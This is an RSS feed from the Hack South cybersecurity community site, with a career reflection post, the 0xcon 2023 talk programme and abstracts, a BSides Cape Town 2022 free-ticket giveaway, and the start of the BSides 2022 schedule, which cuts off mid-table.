Jekyll2023-11-07T20:20:17+00:00https://hacksouth.africa/feed.xmlHack SouthSouth Africa's largest cybersecurity community. Hackers, makers, breakers, infosec professionals and students welcome. Join our Discord for cyber events, CTFs and professional development.Hack SouthFrom Barista to ISO270012023-10-12T00:00:00+00:002023-10-12T00:00:00+00:00https://hacksouth.africa/career/from-barista-to-iso27001<p><img src="/assets/images/from-barista-to-iso27001/header.jpg" alt="Preview" /></p>
<p>Life’s journey often takes unexpected turns, and sometimes, those twists can lead to remarkable transformations in your career. Over the past year and a bit, I have gone on a career journey that started from behind a coffee counter and ended with the privilege of leading a team of ISO 27001 internal auditors.</p>
<p>Not so long ago, my days were filled with the rich aroma of coffee beans and the friendly hum of customers. I was a barista, crafting cappuccinos and lattes, creating moments of warmth and connection for patrons. While I loved the hustle and bustle of the cafe, I was nearing the end of my studies and wanted to switch things up a bit.</p>
<p>I was browsing LinkedIn and saw Bevan Lane asking for junior information security consultants, so I decided to throw my hat in the ring and drop him an email. While I was optimistic, due to my lack of certifications or tangible cybersecurity knowledge I didn’t think I was going to be successful in this attempt but thought it would be good interviewing experience. One interview lead into another and roughly a month after that first email I was meeting with the team on Day 1 as an information security consultant.</p>
<p>Being thrown into the deep end, but having the likes of Bevan and Rowan Botha to lean on, meant learning fast and adapting on the fly. I joined in the midst of a big company push towards implementing ISO27001 within companies and conducting their internal audits, with a gap forming for someone to head up the auditing team. I buried my head into ISO27001 and ensured I was well versed, taking every opportunity to get involved in audits and implementation meetings.</p>
<p>After a few months of learning about ISO, I was sent on the PECB ISO 27001 Lead Implementer course which allowed me to bank a certification and was a nice reward for all the work I had been doing. This also boosted my confidence to advise clients on implementations and hold my own during audits.
My time at Infosec Advisory Group so far has flown by and I now find myself heading up an audits and assessments team, something barista me could never see happening.</p>
<p>Within the audits and implementations, being able to talk people at all levels in a company has been vital. You spend hours and hours in meetings, you need to be good at holding a conversation otherwise you can quickly fall into the question-answer monotony.
To pinpoint one specific moment where I started feeling comfortable talking to people way above me in title would be hard, but I rather credit it to multiple smaller interactions with people occupying these C-suite positions in various companies. From conferences, to events hosted by vendors and joining the CISO Alliances for a day, it allowed me to converse with people about cybersecurity, but in a relaxed, non-work environment. No matter their title, they still put their pants on one leg at a time.</p>
<p>Consider this post a bit of personal reflection on my progress, something I think people often don’t do in this fast-paced industry. I am guilty for always looking for the next best thing, sometimes it is good to look back and see just how far you have come.
Remember, your career journey can take unexpected and exciting turns, and with the right dedication, anything can be done. Whether you’re eyeing a career change or are simply curious about a new field, don’t hesitate to take that first step – your transformative journey may be just around the corner.</p>Jared RochatLife’s journey often takes unexpected turns, and sometimes, those twists can lead to remarkable transformations in your career. Over the past year and a bit, I have gone on a career journey that started from behind a coffee counter and ended with the privilege of leading a team of ISO 27001 internal auditors. Not so long ago, my days were filled with the rich aroma of coffee beans and the friendly hum of customers. I was a barista, crafting cappuccinos and lattes, creating moments of warmth and connection for patrons. While I loved the hustle and bustle of the cafe, I was nearing the end of my studies and wanted to switch things up a bit. I was browsing LinkedIn and saw Bevan Lane asking for junior information security consultants, so I decided to throw my hat in the ring and drop him an email. While I was optimistic, due to my lack of certifications or tangible cybersecurity knowledge I didn’t think I was going to be successful in this attempt but thought it would be good interviewing experience. One interview lead into another and roughly a month after that first email I was meeting with the team on Day 1 as an information security consultant. Being thrown into the deep end, but having the likes of Bevan and Rowan Botha to lean on, meant learning fast and adapting on the fly. I joined in the midst of a big company push towards implementing ISO27001 within companies and conducting their internal audits, with a gap forming for someone to head up the auditing team. I buried my head into ISO27001 and ensured I was well versed, taking every opportunity to get involved in audits and implementation meetings. After a few months of learning about ISO, I was sent on the PECB ISO 27001 Lead Implementer course which allowed me to bank a certification and was a nice reward for all the work I had been doing. This also boosted my confidence to advise clients on implementations and hold my own during audits. My time at Infosec Advisory Group so far has flown by and I now find myself heading up an audits and assessments team, something barista me could never see happening. Within the audits and implementations, being able to talk people at all levels in a company has been vital. You spend hours and hours in meetings, you need to be good at holding a conversation otherwise you can quickly fall into the question-answer monotony. To pinpoint one specific moment where I started feeling comfortable talking to people way above me in title would be hard, but I rather credit it to multiple smaller interactions with people occupying these C-suite positions in various companies. From conferences, to events hosted by vendors and joining the CISO Alliances for a day, it allowed me to converse with people about cybersecurity, but in a relaxed, non-work environment. No matter their title, they still put their pants on one leg at a time. Consider this post a bit of personal reflection on my progress, something I think people often don’t do in this fast-paced industry. I am guilty for always looking for the next best thing, sometimes it is good to look back and see just how far you have come. Remember, your career journey can take unexpected and exciting turns, and with the right dedication, anything can be done. Whether you’re eyeing a career change or are simply curious about a new field, don’t hesitate to take that first step – your transformative journey may be just around the corner.0xcon 20232023-10-07T00:00:00+00:002023-10-07T00:00:00+00:00https://hacksouth.africa/conferences/0xcon-2023<p>0xcon is aimed at bringing together the local cyber security community to share knowledge and to network with like minded individuals. This event is very much by the community for the community, so whether you’re a seasoned expert or just starting out, we would love to welcome you to our conference as we enhance our understanding of the cyber security landscape. The conference covers a wide array of topics including cyber security best practices, threat intelligence, IOT security, ransomware, incident response, cloud security, data privacy, application security, penetration testing, coordinated inauthentic behavior and disinformation.</p>
<p>0xcon returns for another year of sharing information in the community. More information about the conference is set out below.</p>
<h3 id="how-to-participate">How to participate</h3>
<ul>
<li>0xcon 2023 will take place on Saturday 4 November 2023 from 09:00 to 17:00 at the <a href="https://goo.gl/maps/E7D7qAFNMSTsDWR29">MTN Innovation Center (214 14th Avenue, Fairland, Johannesburg)</a>.</li>
<li>Tickets are R200 and can be purchased from <a href="https://www.quicket.co.za/events/186022-0xcon-2023#/">Quicket.</a></li>
</ul>
<h3 id="event-program">Event Program</h3>
<p><img src="/assets/images/0xcon/2023-program-v2.jpg" alt="Program" class="align-center" /></p>
<h2 id="keynote---leon-jacobs">Keynote - Leon Jacobs</h2>
<p>Some thoughts on the benefits of research.</p>
<p><em>About Leon</em></p>
<p>Guy who likes to eat with two forks. Hacker @sensepost</p>
<h2 id="2023-year-in-review-threads-of-nation-state-dystopia---jared-naude">2023 Year in Review: Threads of nation-state dystopia - Jared Naude</h2>
<p>Retrospectives are a great tool to look back at past events to understand what went right and what went wrong. In doing so, we can identify lessons that can be learned and what needs to be improved. This talk will be focused on analyzing the major cyber security events of the past year along with insight, analysis, and commentary on what it means for the wider cybersecurity community. 2023 saw a massive shift in the strategy and playbooks of state sponsored actors in targeting, tactics, and methods.</p>
<p>In this talk, we will discuss the impact and significance in the shift of nation-state activity while looking at events of the past year, even if they are not nation state related. Some of the topics and events that will be covered in this talk include the following: How Ukraine has countered Russia’s cyber and disinformation, how Russia is struggling with Chinese technology, the US’s overreaction to TikTok, Chinese state-sponsored activity into US critical infrastructure and US department emails, the rise of commercial spyware and its implications, why the Cyber-Safety Review Board (CSRB) is doomed to fail, the impact of adversarial AI and LLMs, cross tenant cloud vulnerabilities, troubling privacy legislation; and the impact of lost key material.</p>
<p><em>About Jared</em></p>
<p><a href="https://www.twitter.com/JaredNaude">Jared</a> is the Head of Security at Synthesis, where he specializes in enterprise cloud architecture. Jared is passionate and deeply committed to guiding large organizations through the complexities of architecting, securing and operationalizing enterprise cloud environments. Beyond Jared’s professional responsibilities, Jared is an enthusiastic advocate for community building, serving as the organizer of several local security events, including 0xcon, BSides Cape Town, and BSides Joburg. Jared’s research focuses on cybersecurity topics that intersect with national security and foreign policy issues such as encryption, privacy, surveillance, disinformation, and nation-state activity.</p>
<h2 id="ed2root---how-ancient-ipc-mechanisms-can-help-you-today---connor-du-plooy">ed2root - how ancient IPC mechanisms can help you today - Connor du Plooy</h2>
<p>This talk will go over how I found a vulnerability in a text editor on MacOS. Other variants of this vulnerability have been identified in other packages as well, and even though the APIs used by these packages have been deprecated for a really long time, it is still around in some software.</p>
<p>The vulnerable component is exposed over IPC, so the talk will be broken down in to the following sections:</p>
<ul>
<li>An introduction to the vulnerable component (+- 5 minutes)</li>
<li>A brief demonstration of the vulnerability (+- 2 minutes) (how to get root from a text editor)</li>
<li>A primer to show how the software can be identified by combining static/dynamic analysis techniques (+- 2 minutes)</li>
<li>QAs</li>
</ul>
<p>Key Takeaways:</p>
<ul>
<li>Why using deprecated APIs is always a bad idea</li>
<li>How to identify vulnerable software</li>
<li>Understand the abstractions you build on</li>
</ul>
<p><em>About Connor</em></p>
<p>I work as a mobile security consultant for MWR CyberSec. I love security but specifically have a passion for mobile applications and reverse engineering.</p>
<h2 id="let-the-children-play---leveraging-ad-cs-for-persistence-and-profit-in-parent-child-configured-forests---tinus-green">Let the Children play - Leveraging AD CS for persistence and profit in Parent-Child configured forests - Tinus Green</h2>
<p>In 2021, Active Directory Certificate Services (AD CS) came under scrutiny because of the opportunities it provides attackers for credential theft, domain and forest privilege escalation, and persistence. Since then, it has become a household name for red and blue teams alike. Unintended consequences and additional attack avenues are continually being discovered. This talk will cover new discoveries in this space from two perspectives:</p>
<ul>
<li>Lateral Movement - Noisy compromises of the Parent domain through Golden or Diamond tickets to get to other Child domains are a thing of the past</li>
<li>Cross-Domain Escalation - A newly discovered default permission misconfiguration allowing forest-wide persistence from any Child domain</li>
</ul>
<p>This talk will not only demonstrate these newly discovered attacks and the tooling released to exploit them, but also provide insights into mitigation methods that can be applied to close these attack avenues and the detection methods that can be used to discover them.</p>
<p><em>About Tinus</em></p>
<p>Tinus is currently the Head of Consultancy, where he leads the entire consultancy division, including all service areas and the research division. Previously he was the Service Lead for the Network Security and Application Security divisions and second-in-command for these services globally. In these services, he helped innovate in the respective service space to ensure that MWR provides top-tier, research-driven services to their clients.</p>
<p>In the Cyber-defence field, he assists executives and senior management teams of several strategic clients in an advisory capacity in helping solve business and operational security challenges. This includes creating long-term roadmaps for cyber resilience and using the tools available to the organisation to better track and understand their security posture.</p>
<p>He was responsible for creating a Technical Tabletop Exercise solution. This service simulates real-life attacks in a mock environment to provide training opportunities for Computer Security Incident Response Teams (CSIRTs) to enable companies to improve their Incident Response and Management processes.</p>
<p>Since Tinus has a passion for training, he is also involved as a content engineer for TryHackMe to create cyber security training content and a part-time final-year project leader at the University of Pretoria for their EEC Engineering division.</p>
<h2 id="noooooooooo-touch---michael-rodger">Noooooooooo touch! - Michael Rodger</h2>
<p>A few years ago, a new addition to the standard lineup of access control equipment quietly appeared - the humble “No touch” sensor. These mostly replaced physical buttons, the typical use case being letting yourself out from the “inside”, where the “outside” would have some form of control such as a keypad, RFID scanner, biometrics, etc. Naturally if you were already inside, you wouldn’t have to authenticate yourself to leave.
Fast forward to 2020 and “things you didn’t have to touch” were all the rage, so these started popping up all over the place (according to my observations). I was curious as to how they worked, and whether the range could somehow be manipulated. I had a hunch that they functioned by reflecting infrared light of some sort and I confirmed this by buying one and taking it apart. I came up with an idea to brute-force these to open with an external light source, and then high-powered infrared LED behind a lens to extend the range significantly. This was attractive because they are frequently placed on “inside” of glass doors where the “outside” requires authentication, so having a high-powered “no touch blaster” would let you into places you shouldn’t be :)
My initial research revealed that they seem to be more secure than I’d hoped, so I’m now less confident that beating them is even possible, but I have a few more ideas around what could be tried.
At a minimum, this will be a talk about taking a piece of hardware and dissecting it to figure out how it works, and essentially security testing it. General hardware security methodology and my journey from wondering, to opening, to what I learned about the devices. Best case scenario, I find a method that works and talk about the weaknesses and end up with a gadget in my red-team bag of tricks.</p>
<p>Also, the title is “noooooooo touch” with 10x o because the extended range, so I’m <em>really</em> not touching it.</p>
<p><em>About Michael</em></p>
<p>Starting out as an electronic engineer, I quickly learned that my penchant for disassembling things and figuring out how they functioned also meant that I liked breaking things.
I joined the dots to infosec and since around 2013 I’ve been involved in the ZA hacker community. I’ve been helping with conference and meetup organising and badge building for most of the time since then, and in 2023 I made things official by joining the research team at Orange Cyberdefense.
I still tinker with hardware every chance I get, either fixing or improving something I have, or building something new. I’ve already come to terms with the consequences I’ll one day face when I teach my 2 small kids to question and dismantle everything, although my wife has already put a moratorium on bringing home broken electronics because “I’m sure I can fix this”.
I don’t like long walks on the beach because the sand gets everywhere and it smells like fish. I do like mountain biking though. Sorry, did you say “brief?”</p>
<h2 id="this-wide-world-of-consent---jonathon-everatt">This Wide World of Consent - Jonathon Everatt</h2>
<p>With the advent of cloud based technologies and identity management solutions; as well as the widespread adoption of these technologies by businesses and users has introduced new attack vectors that malicious actors can try abuse. One of these is a new type of phishing, called consent phishing.</p>
<p>In Consent Phishing, an attacker-controlled application requests dangerous or sensitive permissions over a user’s account or organisation’s tenant. The goal of Consent Phishing is to gain the necessary authorisation (consent) over an aspect or portion of a user’s account. The consent grants are managed through an Identity Provider using the OAuth 2.0 framework; examples of these technologies would include Azure, Facebook, and Discord.</p>
<p>This talk will explore the concept of consent phishing and utilise examples of consent phishing in Azure to illustrate the explanation. The talk will focus on both the offensive perspective and the defensive perspective of the attack and its relevant indicators of compromise. The talk will also show a high-level investigation of how other technologies tackle the problem of consent phishing.</p>
<p><em>About Jonathon</em></p>
<p>Hi, my name is Jonathon Everatt, I am a CyberSecurity Consultant at MWR CyberSec and the lead of the Web Application Security Service. I graduated from UCT in 2021 with a First Class Computer Science Honours degree. I learnt CyberSecurity through the TryHackMe platform and others where I go by the alias “Fluffiest Bunny”.</p>
<h2 id="hacking-for-humanity---matthew-hughes">Hacking for Humanity - Matthew Hughes</h2>
<p>Have you ever tried your hand at GeoGuessr, the online game that challenges you to guess your location from random street views? In my talk, I’ll unveil the surprising connections between the problem-solving skills used in this game and the world of hacking and cybersecurity.</p>
<p>My journey started with GeoGuessr, where I noticed how similar the way we think during the game is to the thought processes of hackers and cybersecurity experts. It was like learning to hack the real world without realising it!</p>
<p>During the talk, we’ll delve into the fascinating world of seemingly ordinary photos and videos on the internet. I’ll emphasise why it’s crucial for all of us to be cautious about what we share online. You’ll also hear real-life examples of how geolocation, the art of figuring out locations based on clues, has been used to find terrorist compounds and provide crucial evidence in missing persons cases.</p>
<p>But it’s not all about risks. I’ll also demonstrate how we can harness geolocation skills for positive purposes. Through this research I was able to develop an AI tool using machine learning that can analyse and identify street bollards, a key factor in geolocation.</p>
<p>Join me for this talk, where we’ll explore the intriguing connections between a simple online game and the dynamic world of geolocation in cybersecurity.</p>
<p><em>About Matthew</em></p>
<p>My name is <a href="https://twitter.com/dovendyrr">Matthew Hughes</a> - I’ve been a Security Analyst at Orange Cyberdefense’s Sensepost team for over a year now. Based in Cape Town, I’m a high school dropout that has always been fascinated with how technology works, but more importantly how it could be tampered with.</p>
<h2 id="the-cyber-pirates-guide-to-c2-development---gerhard-botha">The cyber-pirate’s guide to C2 development - Gerhard Botha</h2>
<p>Covering the basics and considerations into creating a Command & Control framework. Going over the basics of a C2 and discussing the why’s and where’s of their usage. Then diving into the different elements to take into account when making design choices. We’ll also be covering how to start your own journey. Finally, what you need to look out for when the project is ready to go onto the next step.</p>
<p><em>About Gerhard</em></p>
<p><a href="https://www.twitter.com/gerbot_">A human</a> with a passion for malware development, offensive security research and tooling. Likes hacking and gaming, also likes game hacking, does not like scope-creep. During the day, this human pentests and annoys co-workers with memes. His boss probably thinks he doesn’t do much work.</p>
<h2 id="git-your-secrets---isak-van-der-walt">GIT your secrets? - Isak van der Walt</h2>
<p>This will be the same talk as I presented at 0xcoffee, with some minor updates if time permits.
The talk covers three primary aspects:</p>
<ul>
<li>A technical overview of how the git version control tool works.</li>
<li>Some inherent and typical security issues related to git.</li>
<li>Prevention and resolution of the prior demonstrated issue.</li>
</ul>
<p>This talk does not contain any “new” research but rather just a full presentation of the git internals, the known inherent vulnerabilities and their resolution - all of which have been previously documented.</p>
<p>The first section aims to provide an overview for people not familiar with git, before diving into the building block - so called “plumbing” - tools utilized by git to perform its version control. This serves to provide a better understanding for the vulnerabilities as well as how to better utilize git.</p>
<p>The second section covers inherent vulnerabilities such as lack of author validation and secrets in version control histories, some of which will be accompanied with a basic demonstration. This also provides a baseline for what to look for from a defender’s perspective</p>
<p>Finally the preventative measures and resolutions will be covered to address the aforementioned issues. Some simple measures in addition to the knowledge of the vulnerabilities can vastly reduce most of the surface area and risk associated with the covered vulnerabilities.</p>
<p><em>About Isak</em></p>
<p><a href="https://www.twitter.com/IPmegladon">Isak</a> is a Junior security analyst, fresh out of university this year. Previously did some web and embedded development and later sysadmin work part time before and during my studies. Also serving as a staff member at Hack South and as an organiser for BSides Cape Town.</p>
<h2 id="the-great-china-firewall---tayla-sellschop">The Great China Firewall - Tayla Sellschop</h2>
<p>The talk details living in China.
It covers grappling with censorship and the distinction between state-sponsored and independent VPNs.
It goes over how the firewalls in China work and the various hardware limitations that consumers face.
My life in China, how internet access varies depending on when government committees and conferences that take place.
How information and lack thereof during the beginning of the COVID outbreak
Navigating wechat censorship and the hardware challenges of IOS and Android
Why sometimes you need to go to Hongkong or Taiwan if you want the right app store
China vs the rest of the world app stores</p>
<p><em>About Tayla</em></p>
<p>Hi!! I’m <a href="https://www.twitter.com/taylasellschop">Tayla</a> !! I’m a junior cyber security analyst at Telspace. I have a passion for cyber forensics and crytography. I got into the industry because I wanted to make everyday people safer. I have a backgroung in law and I lived in China for several years.</p>
<h3 id="conclusion">Conclusion</h3>
<p>We look forward to seeing everyone at our event!</p>0xcon0xcon is aimed at bringing together the local cyber security community to share knowledge and to network with like minded individuals. This event is very much by the community for the community, so whether you’re a seasoned expert or just starting out, we would love to welcome you to our conference as we enhance our understanding of the cyber security landscape. The conference covers a wide array of topics including cyber security best practices, threat intelligence, IOT security, ransomware, incident response, cloud security, data privacy, application security, penetration testing, coordinated inauthentic behavior and disinformation. 0xcon returns for another year of sharing information in the community. More information about the conference is set out below. How to participate 0xcon 2023 will take place on Saturday 4 November 2023 from 09:00 to 17:00 at the MTN Innovation Center (214 14th Avenue, Fairland, Johannesburg). Tickets are R200 and can be purchased from Quicket. Event Program Keynote - Leon Jacobs Some thoughts on the benefits of research. About Leon Guy who likes to eat with two forks. Hacker @sensepost 2023 Year in Review: Threads of nation-state dystopia - Jared Naude Retrospectives are a great tool to look back at past events to understand what went right and what went wrong. In doing so, we can identify lessons that can be learned and what needs to be improved. This talk will be focused on analyzing the major cyber security events of the past year along with insight, analysis, and commentary on what it means for the wider cybersecurity community. 2023 saw a massive shift in the strategy and playbooks of state sponsored actors in targeting, tactics, and methods. In this talk, we will discuss the impact and significance in the shift of nation-state activity while looking at events of the past year, even if they are not nation state related. Some of the topics and events that will be covered in this talk include the following: How Ukraine has countered Russia’s cyber and disinformation, how Russia is struggling with Chinese technology, the US’s overreaction to TikTok, Chinese state-sponsored activity into US critical infrastructure and US department emails, the rise of commercial spyware and its implications, why the Cyber-Safety Review Board (CSRB) is doomed to fail, the impact of adversarial AI and LLMs, cross tenant cloud vulnerabilities, troubling privacy legislation; and the impact of lost key material. About Jared Jared is the Head of Security at Synthesis, where he specializes in enterprise cloud architecture. Jared is passionate and deeply committed to guiding large organizations through the complexities of architecting, securing and operationalizing enterprise cloud environments. Beyond Jared’s professional responsibilities, Jared is an enthusiastic advocate for community building, serving as the organizer of several local security events, including 0xcon, BSides Cape Town, and BSides Joburg. Jared’s research focuses on cybersecurity topics that intersect with national security and foreign policy issues such as encryption, privacy, surveillance, disinformation, and nation-state activity. ed2root - how ancient IPC mechanisms can help you today - Connor du Plooy This talk will go over how I found a vulnerability in a text editor on MacOS. Other variants of this vulnerability have been identified in other packages as well, and even though the APIs used by these packages have been deprecated for a really long time, it is still around in some software. The vulnerable component is exposed over IPC, so the talk will be broken down in to the following sections: An introduction to the vulnerable component (+- 5 minutes) A brief demonstration of the vulnerability (+- 2 minutes) (how to get root from a text editor) A primer to show how the software can be identified by combining static/dynamic analysis techniques (+- 2 minutes) QAs Key Takeaways: Why using deprecated APIs is always a bad idea How to identify vulnerable software Understand the abstractions you build on About Connor I work as a mobile security consultant for MWR CyberSec. I love security but specifically have a passion for mobile applications and reverse engineering. Let the Children play - Leveraging AD CS for persistence and profit in Parent-Child configured forests - Tinus Green In 2021, Active Directory Certificate Services (AD CS) came under scrutiny because of the opportunities it provides attackers for credential theft, domain and forest privilege escalation, and persistence. Since then, it has become a household name for red and blue teams alike. Unintended consequences and additional attack avenues are continually being discovered. This talk will cover new discoveries in this space from two perspectives: Lateral Movement - Noisy compromises of the Parent domain through Golden or Diamond tickets to get to other Child domains are a thing of the past Cross-Domain Escalation - A newly discovered default permission misconfiguration allowing forest-wide persistence from any Child domain This talk will not only demonstrate these newly discovered attacks and the tooling released to exploit them, but also provide insights into mitigation methods that can be applied to close these attack avenues and the detection methods that can be used to discover them. About Tinus Tinus is currently the Head of Consultancy, where he leads the entire consultancy division, including all service areas and the research division. Previously he was the Service Lead for the Network Security and Application Security divisions and second-in-command for these services globally. In these services, he helped innovate in the respective service space to ensure that MWR provides top-tier, research-driven services to their clients. In the Cyber-defence field, he assists executives and senior management teams of several strategic clients in an advisory capacity in helping solve business and operational security challenges. This includes creating long-term roadmaps for cyber resilience and using the tools available to the organisation to better track and understand their security posture. He was responsible for creating a Technical Tabletop Exercise solution. This service simulates real-life attacks in a mock environment to provide training opportunities for Computer Security Incident Response Teams (CSIRTs) to enable companies to improve their Incident Response and Management processes. Since Tinus has a passion for training, he is also involved as a content engineer for TryHackMe to create cyber security training content and a part-time final-year project leader at the University of Pretoria for their EEC Engineering division. Noooooooooo touch! - Michael Rodger A few years ago, a new addition to the standard lineup of access control equipment quietly appeared - the humble “No touch” sensor. These mostly replaced physical buttons, the typical use case being letting yourself out from the “inside”, where the “outside” would have some form of control such as a keypad, RFID scanner, biometrics, etc. Naturally if you were already inside, you wouldn’t have to authenticate yourself to leave. Fast forward to 2020 and “things you didn’t have to touch” were all the rage, so these started popping up all over the place (according to my observations). I was curious as to how they worked, and whether the range could somehow be manipulated. I had a hunch that they functioned by reflecting infrared light of some sort and I confirmed this by buying one and taking it apart. I came up with an idea to brute-force these to open with an external light source, and then high-powered infrared LED behind a lens to extend the range significantly. This was attractive because they are frequently placed on “inside” of glass doors where the “outside” requires authentication, so having a high-powered “no touch blaster” would let you into places you shouldn’t be :) My initial research revealed that they seem to be more secure than I’d hoped, so I’m now less confident that beating them is even possible, but I have a few more ideas around what could be tried. At a minimum, this will be a talk about taking a piece of hardware and dissecting it to figure out how it works, and essentially security testing it. General hardware security methodology and my journey from wondering, to opening, to what I learned about the devices. Best case scenario, I find a method that works and talk about the weaknesses and end up with a gadget in my red-team bag of tricks. Also, the title is “noooooooo touch” with 10x o because the extended range, so I’m really not touching it. About Michael Starting out as an electronic engineer, I quickly learned that my penchant for disassembling things and figuring out how they functioned also meant that I liked breaking things. I joined the dots to infosec and since around 2013 I’ve been involved in the ZA hacker community. I’ve been helping with conference and meetup organising and badge building for most of the time since then, and in 2023 I made things official by joining the research team at Orange Cyberdefense. I still tinker with hardware every chance I get, either fixing or improving something I have, or building something new. I’ve already come to terms with the consequences I’ll one day face when I teach my 2 small kids to question and dismantle everything, although my wife has already put a moratorium on bringing home broken electronics because “I’m sure I can fix this”. I don’t like long walks on the beach because the sand gets everywhere and it smells like fish. I do like mountain biking though. Sorry, did you say “brief?” This Wide World of Consent - Jonathon Everatt With the advent of cloud based technologies and identity management solutions; as well as the widespread adoption of these technologies by businesses and users has introduced new attack vectors that malicious actors can try abuse. One of these is a new type of phishing, called consent phishing. In Consent Phishing, an attacker-controlled application requests dangerous or sensitive permissions over a user’s account or organisation’s tenant. The goal of Consent Phishing is to gain the necessary authorisation (consent) over an aspect or portion of a user’s account. The consent grants are managed through an Identity Provider using the OAuth 2.0 framework; examples of these technologies would include Azure, Facebook, and Discord. This talk will explore the concept of consent phishing and utilise examples of consent phishing in Azure to illustrate the explanation. The talk will focus on both the offensive perspective and the defensive perspective of the attack and its relevant indicators of compromise. The talk will also show a high-level investigation of how other technologies tackle the problem of consent phishing. About Jonathon Hi, my name is Jonathon Everatt, I am a CyberSecurity Consultant at MWR CyberSec and the lead of the Web Application Security Service. I graduated from UCT in 2021 with a First Class Computer Science Honours degree. I learnt CyberSecurity through the TryHackMe platform and others where I go by the alias “Fluffiest Bunny”. Hacking for Humanity - Matthew Hughes Have you ever tried your hand at GeoGuessr, the online game that challenges you to guess your location from random street views? In my talk, I’ll unveil the surprising connections between the problem-solving skills used in this game and the world of hacking and cybersecurity. My journey started with GeoGuessr, where I noticed how similar the way we think during the game is to the thought processes of hackers and cybersecurity experts. It was like learning to hack the real world without realising it! During the talk, we’ll delve into the fascinating world of seemingly ordinary photos and videos on the internet. I’ll emphasise why it’s crucial for all of us to be cautious about what we share online. You’ll also hear real-life examples of how geolocation, the art of figuring out locations based on clues, has been used to find terrorist compounds and provide crucial evidence in missing persons cases. But it’s not all about risks. I’ll also demonstrate how we can harness geolocation skills for positive purposes. Through this research I was able to develop an AI tool using machine learning that can analyse and identify street bollards, a key factor in geolocation. Join me for this talk, where we’ll explore the intriguing connections between a simple online game and the dynamic world of geolocation in cybersecurity. About Matthew My name is Matthew Hughes - I’ve been a Security Analyst at Orange Cyberdefense’s Sensepost team for over a year now. Based in Cape Town, I’m a high school dropout that has always been fascinated with how technology works, but more importantly how it could be tampered with. The cyber-pirate’s guide to C2 development - Gerhard Botha Covering the basics and considerations into creating a Command & Control framework. Going over the basics of a C2 and discussing the why’s and where’s of their usage. Then diving into the different elements to take into account when making design choices. We’ll also be covering how to start your own journey. Finally, what you need to look out for when the project is ready to go onto the next step. About Gerhard A human with a passion for malware development, offensive security research and tooling. Likes hacking and gaming, also likes game hacking, does not like scope-creep. During the day, this human pentests and annoys co-workers with memes. His boss probably thinks he doesn’t do much work. GIT your secrets? - Isak van der Walt This will be the same talk as I presented at 0xcoffee, with some minor updates if time permits. The talk covers three primary aspects: A technical overview of how the git version control tool works. Some inherent and typical security issues related to git. Prevention and resolution of the prior demonstrated issue. This talk does not contain any “new” research but rather just a full presentation of the git internals, the known inherent vulnerabilities and their resolution - all of which have been previously documented. The first section aims to provide an overview for people not familiar with git, before diving into the building block - so called “plumbing” - tools utilized by git to perform its version control. This serves to provide a better understanding for the vulnerabilities as well as how to better utilize git. The second section covers inherent vulnerabilities such as lack of author validation and secrets in version control histories, some of which will be accompanied with a basic demonstration. This also provides a baseline for what to look for from a defender’s perspective Finally the preventative measures and resolutions will be covered to address the aforementioned issues. Some simple measures in addition to the knowledge of the vulnerabilities can vastly reduce most of the surface area and risk associated with the covered vulnerabilities. About Isak Isak is a Junior security analyst, fresh out of university this year. Previously did some web and embedded development and later sysadmin work part time before and during my studies. Also serving as a staff member at Hack South and as an organiser for BSides Cape Town. The Great China Firewall - Tayla Sellschop The talk details living in China. It covers grappling with censorship and the distinction between state-sponsored and independent VPNs. It goes over how the firewalls in China work and the various hardware limitations that consumers face. My life in China, how internet access varies depending on when government committees and conferences that take place. How information and lack thereof during the beginning of the COVID outbreak Navigating wechat censorship and the hardware challenges of IOS and Android Why sometimes you need to go to Hongkong or Taiwan if you want the right app store China vs the rest of the world app stores About Tayla Hi!! I’m Tayla !! I’m a junior cyber security analyst at Telspace. I have a passion for cyber forensics and crytography. I got into the industry because I wanted to make everyday people safer. I have a backgroung in law and I lived in China for several years. Conclusion We look forward to seeing everyone at our event!BSIDES 2022 free tickets in giving back2022-11-03T00:00:00+00:002022-11-03T00:00:00+00:00https://hacksouth.africa/conferences/bsides-2022-giving-back-tickets<h3 id="giving-back">Giving Back</h3>
<p>As part of our vision and mission to connect the infosec community in Cape Town and get new people involved, we would like to give back to the community.</p>
<p>We already have the rite of passage initiative to find and assist up an coming students interested in information security, but to add to our initiatives we would like to give away a number of tickets to people who cannot afford the conference.</p>
<p>We don’t want finances to be a blocker to meeting interested and curious future hackers. No matter who we are, all of us started somewhere and someone had to take a chance with us.</p>
<h3 id="apply">Apply</h3>
<p>If you wish to attend Bsides Cape Town 2022 and would like to tell us your story, please see link.
<a href="https://forms.gle/iAht8Ct4Dd93KvLWA">Apply Link</a></p>
<h3 id="conclusion">Conclusion</h3>
<p>Claim your 1 of 10 tickets if your application is successful!</p>Christo (Goose/crypticG00se) GoosenGiving Back As part of our vision and mission to connect the infosec community in Cape Town and get new people involved, we would like to give back to the community. We already have the rite of passage initiative to find and assist up an coming students interested in information security, but to add to our initiatives we would like to give away a number of tickets to people who cannot afford the conference. We don’t want finances to be a blocker to meeting interested and curious future hackers. No matter who we are, all of us started somewhere and someone had to take a chance with us. Apply If you wish to attend Bsides Cape Town 2022 and would like to tell us your story, please see link. Apply Link Conclusion Claim your 1 of 10 tickets if your application is successful!Bsides 2022 programme2022-11-03T00:00:00+00:002022-11-03T00:00:00+00:00https://hacksouth.africa/conferences/bsides-2022-programme<p>Bsides Cape Town 2022 is a month away. We are excited to finally have Cape Town’s hacker summer camp and year end in person again. We have some really exciting speakers and a workshop.</p>
<h3 id="how-to-participate">How to participate</h3>
<ul>
<li>Get your tickets: https://qkt.io/M9YKVw</li>
<li>Keep an eye on our youtube channel:</li>
<li>Buy a hoodie: https://qkt.io/M9YKVw (Merchandise to be fetched on the day)</li>
</ul>
<h3 id="location">Location</h3>
<p>Map: <a href="https://www.google.com/maps/dir/Cape+Town+International+Airport+(CPT),+Matroosfontein,+Cape+Town/The+Old+Biscuit+Mill+375+Albert+Rd+Woodstock,+Cape+Town+7915/@-33.9459699,18.4768862,13z/data=!3m1!4b1!4m13!4m12!1m5!1m1!1s0x1dcc4542f7400bbd:0x40487579e3cf5e90!2m2!1d18.6020851!2d-33.971463!1m5!1m1!1s0x1dcc5da6b46abd99:0x39cc47e5b0eb6340!2m2!1d18.4571621!2d-33.9274629">Google Maps</a>
Venue: https://tobmce.co.za/
More about venue: https://bsidescapetown.co.za/bsides-conf/2022-location</p>
<h3 id="event-program">Event Program</h3>
<table>
<thead>
<tr>
<th>Time</th>
<th>Track 1</th>
<th>Track 2</th>
</tr>
</thead>
<tbody>
<tr>
<td>08h00-09h00</td>
<td>Registration</td>
<td> </td>
</tr>
<tr>
<td>09h00</td>
